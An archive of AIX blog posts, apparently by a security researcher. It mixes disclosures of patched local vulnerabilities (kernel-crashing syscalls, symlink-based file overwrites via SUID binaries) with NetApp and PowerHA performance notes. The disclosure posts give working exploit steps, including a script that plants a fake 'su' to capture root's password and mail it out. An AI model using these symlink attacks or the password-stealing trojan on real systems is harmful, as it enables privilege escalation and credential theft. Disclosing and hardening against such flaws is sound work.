Archive for the ‘AIX’ Category

CVE-2012-0723: the world's first AIX system call fuzzer and its interesting results

Monday, October 7th, 2013

I've been intrigued by so-called fuzzers for a long time, and some time ago I wanted to give them a try on AIX. Let's take one of the most recent AIX releases I had at that time, 6.1 Technology Level #6 Service Pack #4 (by the way, it works on 7.1.0.0 too):

$ oslevel -s
6100-06-04-1112
$ id
uid=100(guest) gid=100(usr)
$
$ ./ble
[After a while system reboots]

root@XYZ:# errpt -j 67145A39 -A
---------------------------------------------------------------------------
LABEL:          DUMP_STATS
Date/Time:       Fri Sep 16 05:06:17 EDT 2011
Type:            UNKN
Resource Name:   SYSDUMP
Description
SYSTEM DUMP
Detail Data
DUMP DEVICE
/dev/lv_dumplv
DUMP SIZE
             242688512
TIME
Fri Sep 16 05:04:31 2011
DUMP TYPE (1 = PRIMARY, 2 = SECONDARY)
           1
DUMP STATUS
           0
ERROR CODE
0000 0000 0000 0000
DUMP INTEGRITY
Compressed dump - Run dmpfmt with -c flag on dump after uncompressing.

FILE NAME

PROCESSOR ID
           0
root@XYZ:#

[..]

(0)> where
pvthread+011200 STACK:
[004CEB5C]rmsock+00001C (F3FCC00000000000 [??])
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9610

(0)>

On a different system, 6100-03-01-0921:

(0)> where
pvthread+00AF00 STACK:
[0043DCFC]rmsock+00001C (F3FC000000000000 [??])
[00003844].svc_instr+000144 ()
[kdb_get_virtual_memory] no real storage @ 2FF229D0
[10000590]10000590 ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9680
(0)>

As you can see above, the fuzzer attempted random syscalls, but on rmsock() – executed by a non-privileged user – it rebooted the system (because of attributes on the sys0 device that make the kernel reboot in case of a kernel panic). A typical Denial of Service attack, isn't it?
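For reference, the fuzzer ("ble") itself is nothing sophisticated. A minimal sketch of the idea could look like the C below; note that this is only an illustration of the approach and not the actual tool – it assumes a Linux/BSD-style generic syscall(2) wrapper, while the exact way of dispatching arbitrary system call numbers on AIX is platform specific:

/* Minimal sketch of a dumb system call fuzzer (illustration only).
 * Assumes a generic syscall(2) wrapper as on Linux/BSD; the real AIX
 * tool has to use a platform-specific dispatch mechanism. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/syscall.h>

int main(int argc, char **argv)
{
    long only = (argc > 1) ? atol(argv[1]) : -1;   /* optional: fuzz one syscall number */

    if (only >= 0)
        printf("using only sc=%ld\n", only);

    srandom(getpid());
    for (;;) {
        pid_t pid = fork();            /* fork, so a killed child does not stop the loop */
        if (pid == 0) {
            long nr = (only >= 0) ? only : (random() % 1024);
            /* six garbage arguments: most calls just fail with EINVAL/EFAULT,
             * an unlucky combination may panic the kernel (see the dumps above) */
            syscall(nr, random(), random(), random(), random(), random(), random());
            _exit(0);
        }
        if (pid > 0)
            waitpid(pid, NULL, 0);
    }
    return 0;
}

Nothing more than throwing random numbers at the kernel and waiting for it to fall over.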

Now let’s try something more intelligent (found during the research) – using only syscall number 793 on version 6100-06-04-1112:

$ ./ble 793
using only sc=793

... and the system is dead. In an AIX kernel debugger session on the dump file after reboot you can see that even the system call vector instruction handler seems not to be visible, perhaps indicating some kind of memory overwrite in kernel space. This could (probably) be exploited by finding the offset of the privilege structure holding all the UID/GIDs:

(0)> where
pvthread+018C00 STACK:
[0001BF00]abend_trap+000000 ()
[000C585C]xm_bad_free+00025C (??, ??, ??, ??)
[000C4F30]xmfree+0004F0 (??, ??)
[046A7868]ptx_get_ndd_tree+000088 (??, ??, ??, ??, ??)
[00003850]ovlya_addr_sc_flih_main+000130 ()
[kdb_get_virtual_memory] no real storage @ 2FF22AC8
[1000070C]1000070C ()
[kdb_read_mem] no real storage @ FFFFFFFFFFF9640

(0)>
[..]
(0)> ppid 06400D8
              SLOT NAME     STATE      PID    PPID          ADSPACE  CL #THS

pvproc+019000  100*ble      ACTIVE 06400D8 07700C8 0000000848B32480   0 0001

[..]
IDENTIFIER. uid        :00000064  ........... suid       :00000064
........... pid        :006400D8  ........... ppid       :007700C8
........... sid        :006E0092  ........... pgrp       :006400D8
[..]
(0)> nm pvproc
Symbol Address : F1000F0A00000000
   TOC Address : 02B65540

(0)>

So as you can see, the UID of our "ble" system call fuzzing process was 0x64 (or 100 if you are uncomfortable with hex notation). By changing the value at address 0xF1000F0A00000000+0x19000 one could probably get a root shell, but researching my way to do that could be very time intensive.

And a sample from the most recent AIX 7.1 release I had access to:

guest@hostA:# oslevel -s
7100-00-03-1115
guest@hostA:# ./ble 766
using only sc=766

… and the system is dead:

(2)> where
pvthread+011100 STACK:
[F1000000C01E06CC]dupb+00000C (0000000030CBEE17 [??])
[F1000000C01E05DC]dupmsg+00001C (??)
[00014D70].hkey_legacy_gate+00004C ()
[0000386C]ovlya_addr_sc_flih_main+00014C ()
[kdb_get_virtual_memory] no real storage @ FFFFFFFF3FFFE60
[kdb_read_mem] no real storage @ FFFFFFFFFFF95F0

(2)>

IBM was notified months ago, and a patch was released some time ago: http://aix.software.ibm.com/aix/efixes/security/syscall_advisory.asc (it affects AIX 5.3, 6.1 and 7.1 plus all VIOS too). Happy patching :)

-J.

CVE-2012-2179: lsvg(1) AIX61/71 – libodm.a vulnerable due to the ODMERR env

Thursday, July 12th, 2012

This is a new local attack against at least AIX 6.1 / 7.1 – or at least there was enough time for anyone seriously considering security to patch their systems (IBM released the info on 2012-06-22, today is 2012-07-12)... It is a typical arbitrary-file-overwrite symlink vulnerability caused by a libodm.a bug, giving local root. libodm.a (in this case used by the SUID lsvg binary) performs a getenv("ODMERR") – an undocumented environment variable – which, if set, triggers the debug code to dump the debug log messages generated at runtime by libodm.a always to the same file – ODMTRACE0 (or ODMTRACE1, etc.) – in the current working directory (this seems to be related to getcwd()).
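The vulnerable pattern boils down to something like the reconstruction below (my illustration, not IBM's actual code): a SUID binary checks an environment variable and then opens a fixed trace file name in an attacker-controlled current directory, following whatever is already there; a defensive open would refuse symlinks and pre-existing files:

/* Reconstruction of the vulnerable pattern (illustration, not IBM's code). */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

static void odm_trace_open_unsafe(void)
{
    if (getenv("ODMERR") == NULL)      /* undocumented debug switch */
        return;
    /* SUID binary + attacker-controlled cwd: if ODMTRACE0 is a symlink to
     * /etc/ssh/sshrc, the target gets created/written with root privileges
     * and with the caller's umask */
    FILE *f = fopen("ODMTRACE0", "a");
    if (f != NULL) {
        fputs(" __odm_initfini_init: Start\n", f);
        fclose(f);
    }
}

static int odm_trace_open_safer(void)
{
    /* refuse to follow symlinks and refuse pre-existing files */
    return open("ODMTRACE0", O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

int main(void)
{
    odm_trace_open_unsafe();
    return odm_trace_open_safer() < 0;
}

Now, the proof: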

guest@XXX:# oslevel -s
7100-00-03-1115
guest@XXX:# export ODMERR=1
guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# umask 0000
guest@XXX:# lsvg
rootvg
appvg
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 ->
/etc/ssh/sshrc
guest@XXX:# head -3 ODMTRACE0
 __odm_initfini_init: Start
 __odm_initfini_init: End
 odm_set_path: Start
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff          7332 Dec 22 05:42 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# vi /etc/ssh/sshrc
# a lot of typing
guest@XXX:# cat /etc/ssh/sshrc
#!/bin/sh
# proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull
#
# /etc/environment usually sets PATH from scratch so we have to
# cheat via ~/.profile which is read by user's shell at later stage
#

mkdir /tmp/$$
cat > /tmp/$$/su << EOF
#!/bin/bash
#this would be a su backdoor sendming email or transmiting pw over dns...
echo -e "root's Password: \c"
stty -echo
read PW
stty echo
echo
#echo your PW is \$PW
echo \$USER \$HOSTNAME \$PW | mail -s cookie your@email.com >
/dev/null 2>&1
echo '[compat]: 3004-300 You entered an invalid login name or password.'
echo
echo '3004-501 Cannot su to "root" : Authentication is denied.'
rm -f /tmp/$$/su
exit 0
EOF
chmod 755 /tmp/$$/su

cat >> ~/.profile << EOF
export PATH=/tmp/$$:$PATH
EOF

guest@XXX:#

How does it work? If the above attack is performed and somebody else logs in remotely using ssh (root or just a regular user), then the /etc/ssh/sshrc contents are executed (by sshd) with that user's privilege level. In this case PATH is altered to hijack "su" executions and potentially obtain the password. This could also be adapted, e.g., to catch the "sudo" password too.

Potential workaround: drop the SUID bit from all binaries linked against libodm.a (yes, I find it kind of hard due to the need to drop the SUID bit even from lsvg, which may break a lot of IBM/3rd-party software, especially some agents using commands such as lsvg for monitoring).

Fixed via CVE-2012-2179; more info here: http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc

IBM AIX still doesn't come with proper hardened protection against /tmp races, as mentioned in the previous blog entry about CVE-2011-1384. Timeline: almost 180 days for IBM to fix.

BTW: this proof of concept could easily be adapted to give instant root (as you can create any file that does not exist), but I'm not going to disclose weaponized versions.

-J.

CVE-2011-1384 AIX inventory scout file deletion and symlink vulnerability

Thursday, December 29th, 2011

It's been two weeks since IBM published the official advisory for this vulnerability in AIX 5.3 (not tested by me), 6.1 (tested by me) and 7.1 (also tested by me) here: http://aix.software.ibm.com/aix/efixes/security/invscout_advisory2.asc, so I'm going to talk a little bit about the technical details. The attack is very trivial and it exists due to the SUID binary invscoutClient_VPD_Survey being installed by default in any version of AIX.

guest@XXX:# ln -s /etc/ssh/sshrc /tmp/invtemp.log
guest@XXX:# umask 0000
guest@XXX:# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
/var/adm/invscout/8204-E8A_101D2B2_21_VPD.xml
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff         12591 May 20 03:18 /etc/ssh/sshrc
guest@XXX:# cat > /etc/ssh/sshrc
#!/bin/sh
# place your commands here to be executed as owned users
echo HACKED > /I_WAS_HERE
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff            36 May 20 03:19 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# oslevel -s
6100-06-02-1044       <-- YAY!
guest@XXX:#
guest@XXX:# ls -l /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
-r-sr-xr-x    1 root     system     11779340 Jun 30 2010  /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
guest@XXX:#

So what happens is that invscoutClient_VPD_Survey overwrites (or creates) whatever /tmp/invtemp.log points to... even if the target really exists. If it doesn't exist (a soft link to a non-existing file such as, e.g., /etc/ssh/sshrc), then it is created using the default umask. Of course all of this works for every non-privileged user...

There are many attack vectors, but I'm presenting /etc/ssh/sshrc here mainly because it is one of the simplest ones. After such an attack nothing happens until someone logs into the box using SSH; then, for example, the OpenSSH daemon is going to read and execute the contents of /etc/ssh/sshrc under the privileges of the logging-in user (e.g. guest can hijack the "admin" account, or the "root" account if that one is used e.g. for routine SSH activities after SSH key exchange; if only "admin" could be taken over, one can simply escalate privileges to "root" by installing a hijacked version of the "su" or "sudo" binary and altering $PATH – this would allow stealing root's password and/or privileges).

Fixing this one is very trivial: just follow the guide from IBM (yup, dropping the SUID bit does nothing wrong to your system).

Timeline is as follows:

  • Discovered: 19.05.2011
  • Submitted to IBM: 24.06.2011
  • 1st IBM response: 05.07.2011

Next ones to follow... however, one thing worries me the most. The whole world knows about this class of attacks, but there is not a single major vendor on this planet that would prevent such attacks from happening by hardening the OS kernel. For example, the GRSecurity and OpenWall projects are completely different: this kind of protection (symlink races, /tmp protection) has existed there for almost a decade... but those are kernel patches for Linux, not something I would consider mainstream... unfortunately. GRSecurity is a really excellent piece of work; they have implemented realistic protection against realistic, real-world technical flaws. So my question is simple: is any of the major OS vendors interested in realistic security at all?

There is also a very good discussion about the /tmp UNIX/POSIX problems and generally poorly written code on LWN. Also, the list of similar attacks is pretty long (264 vulnerabilities as of this writing).

The solution could be pretty obvious at the heart/kernel of a system such as AIX: just implement logic like the following pseudo-C code inside the open(2)/creat(2) system calls:

[..]
/* any open(2)/creat(2) flag combination that can create or modify the file
   (note the parentheses: without them the | vs & precedence breaks the test) */
#define AM_I_WRITING (O_RDWR | O_WRONLY | O_CREAT | O_APPEND)

if ((flags & AM_I_WRITING) != 0) {
    /* refuse to follow a symlink whose target belongs to another user */
    if (is_symlink(path) && symlink_endpoint_owner_is_different_user(path, current_user)) {
        return -EACCES;
    }
}
[..]

This may not be the best solution; GRSecurity has something like the following, which may be much better suited for this particular problem:

config GRKERNSEC_LINK
bool “Linking restrictions”
help
If you say Y here, /tmp race exploits will be prevented, since users
will no longer be able to follow symlinks owned by other users in
world-writable +t directories (e.g. /tmp), unless the owner of the
symlink is the owner of the directory. users will also not be
able to hardlink to files they do not own. If the sysctl option is
enabled, a sysctl option with name “linking_restrictions” is created.

WAFL performance VS sequential reads: part III, FC LUN performance from AIX vs read_realloc

Thursday, July 7th, 2011

Continuing my series about LUN fragmentation in WAFL (part 1, part 2), I wanted to give the read_realloc option a try. Mostly the same storage system (still Data ONTAP 7.3.2) and settings were used, with the exception that I used an even more powerful AIX system with POWER7 CPU cores (it shouldn't matter, as I was not at all constrained by CPU power during the benchmarks).

The methodology was simple:
1) Do a lot of random and sequential writes to JFS2 on top of that LUN, on a FlexVol with read_realloc=off, to fragment the LUN as much as possible
2) Start a loop of large random reads (simulating, let's say, many random full table scans of up to 1MB each in an Oracle data file) on top of that JFS2 filesystem (BTW: this time without CIO)

The full measurement took about 18 hours (yes, the storage was hammered non-stop for 18 hours with just reads). The results are pretty interesting:

... it basically shows how NetApp storage can self-optimize and adapt based on the workload. Now I'm just wondering how it works under the hood (i.e. what the trade-off or worst possible scenario for this kind of setting is). What was even more interesting is that "reallocate measure" indicated after the whole cycle that the LUN was really nicely de-fragmented:

Thu Jul  7 03:32:20 EDT [X: wafl.reallocate.check.value:info]: Allocation measurement check on '/vol/fc_fill_aggr_sm/lun' is 3.

AIX disk I/O pacing vs PowerHA

Wednesday, July 6th, 2011

Recently I've played with disk I/O pacing (technically the minpout and maxpout parameters) on AIX 6.1. The root cause of this investigation was some high I/O waits in production. Default AIX 6.1 and 7.1 systems come with maxpout set to 8193 and minpout to 4096, respectively. However, old deployments and HACMP <= 5.4.1 installation procedures still recommend a value of 33/24; just take a look at an old High Availability Cluster Multi-Processing Troubleshooting guide:
“Although the most efficient high- and low-water marks vary from system to system, an initial high-water mark of 33 and a low-water mark of 24 provides a good starting point. These settings only slightly reduce write times and consistently generate correct fallover behavior from the HACMP software.”

Additionally, IBM has described the whole disk I/O pacing mechanics in this link.

100% write results with maxpout=8193 minpout=4096 (defaults)
orion_20110706_0525_summary.txt:Maximum Large MBPS=213.55 @ Small=0 and Large=6
orion_20110706_0525_summary.txt:Maximum Small IOPS=32323 @ Small=2 and Large=0

100% write results with maxpout=33 minpout=24 (old HACMP)
orion_20110706_0552_summary.txt:Maximum Large MBPS=109.64 @ Small=0 and Large=10
orion_20110706_0552_summary.txt:Maximum Small IOPS=31203 @ Small=5 and Large=0

As you can see there is a drastic change when it comes to large sequential writes, but don't change those parameters yet! You really need to read the following sentence from the IBM site: "The maxpout parameter specifies the number of pages that can be scheduled in the I/O state to a file before the threads are suspended." It is obvious that those parameters exist to prevent I/O-resource-hungry processes from dominating the CPU. If you consider that the smallest page size is 4kB, with 64kB sometimes used automatically by Oracle, you might get 33*64kB = 2112kB in the best case, after which the thread doing the I/O is suspended! Ouch! And what is the mechanism for taking the CPU away from an active process? It is called an involuntary context switch...

Why is this all important with HACMP/PowerHA software? Because it is implemented as normal shell scripts and some RSCT processes, which are mostly not running in kernel mode at all (at least everything below PowerHA 7.1)! The only way PowerHA/HACMP can give more CPU horsepower to the processes needing it is to give them a higher priority on the run queue; just take a look at the PRI column...

root@X: /home/root :# ps -efo "sched,nice,pid,pri,comm"|sort -n +3|head
SCH NI     PID PRI COMMAND
  - --  520286  31 hatsd
  - --  729314  38 hats_diskhb_nim
  - --  938220  38 hats_nim
  - --  622658  39 hagsd
  - 20  319502  39 clstrmgr
  - 20  348330  39 rmcd
  - 20  458874  39 gsclvmd
  - 20  508082  39 gsclvmd
  - 20  528554  39 gsclvmd
root@X: /home/root :#

... but it appears that even that might not be enough in some situations. As you can see there is no easy answer to this question, and you would have to drive your exact system configuration to 99-100% CPU utilization on all POWER cores to see whether you start getting random failovers, because e.g. some HACMP process might get its heartbeat too late due to CPU scheduling. So perhaps the way forward for 33/24 environments is to leave the values somewhere between 33/24 and 8193/4096 (like the 513/256 mentioned in the IBM manuals). Another thing is that you should never have a system driven to > 80% CPU usage on all physical cores, but you should know that already :)

WAFL performance VS sequential reads: part I, FC LUN performance from AIX vs FlexVol utilization

Friday, June 24th, 2011

Some time ago I started thinking about getting more serious about performance research on the AIX 6.1, PowerHA and Oracle stack on top of NetApp storage. One of the first things I wanted to measure was how NetApp's WAFL handles FlexVol utilization in correlation to space usage. In theory, long sequential reads (as in the Oracle data warehouses I'm interested in) could be affected by the fragmentation introduced by WAFL (Write *Anywhere* File Layout).

Some specs first:

  • DataONTap version 7.3.2, single Netapp controller 3160 was tested (but in cluster).
  • The test was done using Oracle's Orion 11.1.0.7 storage benchmarking tool on top of AIX (orion_aix_ppc64 -run advanced -num_disks 5 -cache_size 2048 -write 30 -duration 20 -type rand -matrix basic) – as you can see the read vs write ratio was 70% to 30%, but only long reads are presented (I was not interested in the performance of 8kB reads/writes, just 1MB long reads)
  • AIX was connected via VFCs to two separate VIOS, each of which was connected using 2 FC 8 Gbps links (but running in 4 Gbps mode due to the Brocade SAN switches not supporting 8 Gbps)
  • The NetApp controller had 4 Gbps ports
  • AIX was using 6.1's internal MPIO (round-robin) for the tested LUN
  • The AIX hdisk queue depth for the LUN was set to the default value of 12 (as per the NetApp Host Attachment Kit)
  • The AIX JFS2 filesystem was mounted with Concurrent I/O to prevent AIX from caching and read-aheads (AIX still had 3GB of RAM allocated, but the VMM should not use it)
  • The NetApp storage controller had 4 processors, 8GB RAM and 2GB of NVRAM (as indicated by the sysconfig output; of course, as this is a cluster, only 1GB was usable)
  • LUN size was 20GB, on top of 50GB FlexVol on RAID-DP aggregate with 5x FC 15k RPM disks
X> vol options full_aggr_test
nosnap=off, nosnapdir=off, minra=off, no_atime_update=off, nvfail=off,
ignore_inconsistent=off, snapmirrored=off, create_ucode=on,
convert_ucode=off, maxdirsize=83804, schedsnapname=ordinal,
fs_size_fixed=off, compression=off, guarantee=volume, svo_enable=off,
svo_checksum=off, svo_allow_rman=off, svo_reject_errors=off,
no_i2p=off, fractional_reserve=100, extent=off, try_first=volume_grow,
read_realloc=off, snapshot_clone_dependency=off
X> df -Ag aggr_used
Aggregate                total       used      avail capacity
aggr_used               1102GB      668GB      433GB      61%
aggr_used/.snapshot         0GB        0GB        0GB     ---%
X>
X> snap list -A aggr_used
Aggregate aggr_used
working...

No snapshots exist.
X> snap sched -A aggr_used
Aggregate aggr_used: 0 0 0
X>

The WAFL aggregate was idle during the test and was configured and running as follows:

Aggregate aggr_used (online, raid_dp) (block checksums)
  Plex /aggr_used/plex0 (online, normal, active)
    RAID group /aggr_used/plex0/rg0 (normal)

      RAID Disk Device  HA  SHELF BAY CHAN Pool Type  RPM  Used (MB/blks)    Phys (MB/blks)
      --------- ------  ------------- ---- ---- ---- ----- --------------    --------------
      dparity   2d.18   2d    1   2   FC:B   -  FCAL 15000 418000/856064000  420156/860480768
      parity    1d.19   1d    1   3   FC:A   -  FCAL 15000 418000/856064000  420156/860480768
      data      2d.21   2d    1   5   FC:B   -  FCAL 15000 418000/856064000  420156/860480768
      data      1d.22   1d    1   6   FC:A   -  FCAL 15000 418000/856064000  420156/860480768
      data      2d.23   2d    1   7   FC:B   -  FCAL 15000 418000/856064000  420156/860480768

[..]

X> aggr status aggr_used -v
           Aggr State           Status            Options
       aggr_used online          raid_dp, aggr     nosnap=off, raidtype=raid_dp,
                                                  raidsize=16,
                                                  ignore_inconsistent=off,
                                                  snapmirrored=off,
                                                  resyncsnaptime=60,
                                                  fs_size_fixed=off,
                                                  snapshot_autodelete=on,
                                                  lost_write_protect=on
[..]

X> df -g full_aggr_test
Filesystem               total       used      avail capacity  Mounted on
/vol/full_aggr_test/       50GB       20GB       29GB      40%  /vol/full_aggr_test/
/vol/full_aggr_test/.snapshot        0GB        0GB        0GB     ---%  /vol/full_aggr_test/.snapshot
X>
X> snap list full_aggr_test
Volume full_aggr_test
working...

No snapshots exist.
X>

From the AIX point of view, the filesystem was configured as follows (notice those big files for Orion's use):

root@Y:# df -m .
Filesystem    MB blocks      Free %Used    Iused %Iused Mounted on
/dev/fslv00    19456.00   2099.70   90%        7     1% /fullaggr
root@Y:# du -sm *
10000.01        bigfile
7353.00 bigfile2
0.00    lost+found
0.00    orion.lun
root@Y:#

Results:

Methodology:
For each successive attempt a snapshot was created to grow the space used inside the FlexVol until it was full (40%..100%). There was a single Orion execution after each snapshot was created. The Y-axis represents the maximum bandwidth observed for sequential 1MB reads (as reported by Orion). The Z-axis (depth), ranging from 1 to 10, represents the number of concurrent/parallel reads being done by Orion (to, let's say, simulate multiple full table scans happening on the same LUN). As is visible from the graph, when FlexVol utilization is close or equal to 100%, a more than two-fold performance drop can be observed (40-45 MB/s vs 10-15 MB/s). The sane maximum FlexVol utilization seems to be somewhere around 70% to avoid problems with fragmentation. The AIX system was mostly running with default settings, without any more advanced optimizations (that was done on purpose, except for Concurrent I/O).

PowerHA failure scenario when dealing with SAN-booted LPARs – part IV

Thursday, June 9th, 2011

If you are wondering how the story ended up, just be sure to read IBM PowerHA SystemMirror 7.1 for AIX. It appears that full clustering support for LPARs having their rootvg on SAN is starting to be properly supported on PowerHA versions 7.1 and higher...

The rootvg system event
PowerHA SystemMirror 7.1 introduces system events. These events are handled by a new
subsystem called clevmgrdES. The rootvg system event allows for the monitoring of loss of
access to the rootvg volume group. By default, in the case of loss of access, the event logs an
entry in the system error log and reboots the system. If required, you can change this option
in the SMIT menu to log only an event entry and not to reboot the system.

and later:
The rootvg system event
As discussed previously, event monitoring is now at the kernel level. The
/usr/lib/drivers/phakernmgr kernel extension, which is loaded by the clevmgrdES
subsystem, monitors these events for loss of rootvg. It can initiate a node restart operation if
enabled to do so as shown in Figure 9-9.
PowerHA 7.1 has a new system event that is enabled by default. This new event allows for the
monitoring of the loss of the rootvg volume group while the cluster node is up and running.
Previous versions of PowerHA/HACMP were unable to monitor this type of loss. Also the
cluster was unable to perform a failover action in the event of the loss of access to rootvg. An
example is if you lose a SAN disk that is hosting the rootvg for this cluster node.

PowerHA failure scenario when dealing with SAN-booted LPARs – part III

Tuesday, April 12th, 2011

OK, this is part III of the rather long story. As shown in the previous parts, the problem is really tricky: we cannot run anything in the event of losing storage (you cannot read binaries if you don't have storage). OK, so how does HACMP/PowerHA deal with it?

If you lose all storage Virtual FibreChannel connections, this is going to be reported as a loss of quorum for a VG in AIX's error reporting facility. In theory this error should be propagated to the HACMP/PowerHA failover mechanism so that the RG is evacuated from the affected node. Sometimes this behaviour is called "selective failover behavior". The technical details are pretty interesting, as they show the lack of real/solid integration between the AIX kernel and HACMP/PowerHA. The primary source of information is the AIX RAS reporting facility (see "man errpt" for more info) and the errdemon process. Errdemon takes the proper actions based on the configuration of "errnotify" ODM objects. The installation of PowerHA adds special hooks so that messages about failing hardware/OS/probes (in this case losing quorum on VGs) are propagated to the HACMP/PowerHA scripts. This can be verified as follows:

root@jkwha001d : /home/root :# odmget errnotify | tail -17

errnotify:
        en_pid = 0
        en_name = "clSF1"
        en_persistenceflg = 1
        en_label = "LVM_SA_QUORCLOSE"
        en_crcid = 0
        en_class = "H"
        en_type = "UNKN"
        en_alertflg = ""
        en_resource = "LVDD"
        en_rtype = "NONE"
        en_rclass = "NONE"
        en_symptom = ""
        en_err64 = ""
        en_dup = ""
        en_method = "/usr/es/sbin/cluster/diag/clreserror $9 $1 $6 $8"
root@jkwha001d : /home/root :#
root@jkwha001d : /home/root :# /usr/lib/errdemon -l
Error Log Attributes
--------------------------------------------
Log File                /var/adm/ras/errlog
Log Size                1048576 bytes
Memory Buffer Size      32768 bytes
Duplicate Removal       true
Duplicate Interval      10000 milliseconds
Duplicate Error Maximum 1000
root@jkwha001d : /home/root :#

... so the method for recovering from losing SAN storage (also on SAN-booted hosts) seems to be the script /usr/es/sbin/cluster/diag/clreserror. Of course, in this particular case that script is also located on the SAN...

root@jkwha001d:# ls -l /usr/es/sbin/cluster/diag/clreserror
-r-x------    1 root     system        13813 Feb 24 2009  /usr/es/sbin/cluster/diag/clreserror
root@jkwha001d:# file /usr/es/sbin/cluster/diag/clreserror
/usr/es/sbin/cluster/diag/clreserror: shell script  - ksh (Korn shell)
root@jkwha001d:# head -45  /usr/es/sbin/cluster/diag/clreserror
#!/bin/ksh93
[..]
#
#  Name:        clreserror
#
#   Notify method in errnotify stanzas that are configured for Selective
#   Fallover triggered by (AIX) Error Notification.
#   This function is merely a wrapper for clRMupdate.
#
#   Argument validation is performed in the clRMapi.
#
#  Arguments:
#
#       $1      Error Label, corresponds to errnotify.en_label
#       $2      Sequence number of the AIX error log entry
#       $3      Resource Name, corresponds to errnotify.en_resource
#       $4      Resource class, corresponds to errnotify.en_class
#
#       Argument validation is performed in the clRMapi.
#
#       Environment:  PATH
#
root@jkwha001d:#

And rest assured that this script calls a lot of other scripts, which of course can be unavailable if rootvg is on the same physical storage as the affected VG.

There are actually two good findings here. The first one is that if you lose all SAN-based hdisks you are going to be flooded with thousands of entries in the errpt facility. Those can go undetected by errdemon because of the in-memory log overflowing. The workaround for the first case seems to be trivial: just enlarge the error log buffer. This is documented here:

root@jkwha001d : /home/root :# /usr/lib/errdemon -B 1048576
0315-175 The error log memory buffer size you supplied will be rounded up
to a multiple of 4096 bytes.
root@jkwha001d : /home/root :# /usr/lib/errdemon -l
Error Log Attributes
--------------------------------------------
Log File                /var/adm/ras/errlog
Log Size                1048576 bytes
Memory Buffer Size      1048576 bytes
Duplicate Removal       true
Duplicate Interval      10000 milliseconds
Duplicate Error Maximum 1000
root@jkwha001d : /home/root :#

Additionally, it seems to have some value to mirror some of the LVs on the affected VGs. This might add some stability to the detection of losing LVM quorum, i.e. this shows the LVM log LV loglv04 properly mirrored across 2 hdisks (PVs)...

root@jkwha001d:# lsvg -p jw1data1vg
jw1data1vg:
PV_NAME           PV STATE          TOTAL PPs   FREE PPs    FREE DISTRIBUTION
hdisk5            active            479         30          00..00..00..00..30
hdisk3            active            479         30          00..00..00..00..30
root@jkwha001d:# lsvg -l jw1data1vg
jw1data1vg:
LV NAME             TYPE       LPs     PPs     PVs  LV STATE      MOUNT POINT
jw1data1            jfs2       896     896     2    open/syncd    /oracle/JW1/sapdata1
loglv04             jfs2log    1       2       2    open/syncd    N/A
root@jkwha001d:# lslv loglv04
LOGICAL VOLUME:     loglv04                VOLUME GROUP:   jw1data1vg
LV IDENTIFIER:      0001d2c20000d9000000012b86756f99.2 PERMISSION:     read/write
VG STATE:           active/complete        LV STATE:       opened/syncd
TYPE:               jfs2log                WRITE VERIFY:   off
MAX LPs:            512                    PP SIZE:        32 megabyte(s)
COPIES:             2                      SCHED POLICY:   parallel
LPs:                1                      PPs:            2
STALE PPs:          0                      BB POLICY:      relocatable
INTER-POLICY:       minimum                RELOCATABLE:    yes
INTRA-POLICY:       middle                 UPPER BOUND:    128
MOUNT POINT:        N/A                    LABEL:          None
MIRROR WRITE CONSISTENCY: on/ACTIVE
EACH LP COPY ON A SEPARATE PV ?: yes
Serialize IO ?:     NO
root@jkwha001d:#

The second finding is that even with all those changes there is a very high probability of failure (i.e. the PowerHA RG move won't work). Personally, the risk is so high that for me it is nearly a guarantee. The only proper solution to this problem that I am able to see is to add a special handler to the err_method in the errdemon code, something like err_method = KILL_THE_NODE. This KILL_THE_NODE should be implemented internally by the always-running errdemon process. The process should be running with its memory protected from swapping (something like mlockall())... because currently it is not running that way:

root@jkwha001d:# svmon -P 143470
-------------------------------------------------------------------------------
     Pid Command          Inuse      Pin     Pgsp  Virtual 64-bit Mthrd  16MB
  143470 errdemon         24851    11028        0    24700      N     N     N

     PageSize                Inuse        Pin       Pgsp    Virtual
     s    4 KB                 323          4          0        172
     m   64 KB                1533        689          0       1533

    Vsid      Esid Type Description              PSize  Inuse   Pin Pgsp Virtual
   7c05d         d work fork tree                    m   1041   233    0    1041
                   children=4d6cdc, 0
    8002         0 work fork tree                    m    492   456    0     492
                   children=802760, 0
   4d0f7         2 work process private             sm    131     4    0     131
   35309         3 clnt mapped file,/dev/hd9var:69   s    107     0    -       -
   110c0         f work shared library data         sm     41     0    0      41
   1d023         1 clnt code,/dev/hd2:44058          s     25     0    -       -
   45115         - clnt /dev/hd2:63900               s     11     0    -       -
   3902a         - clnt /dev/hd9var:1015             s      8     0    -       -
root@jkwha001d:#
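To illustrate the mlockall() part of the idea: any such last-resort handler would at minimum have to pin its pages into RAM at startup, so that it can still execute once every read from rootvg starts failing. A hedged sketch using plain POSIX calls (the hypothetical err_method = KILL_THE_NODE hook itself would of course have to live inside errdemon):

/* Sketch: pin a watchdog/handler process into RAM so that it survives
 * the loss of its backing store (POSIX mlockall; requires privileges). */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    /* lock current and future pages: text, data and stack stay resident,
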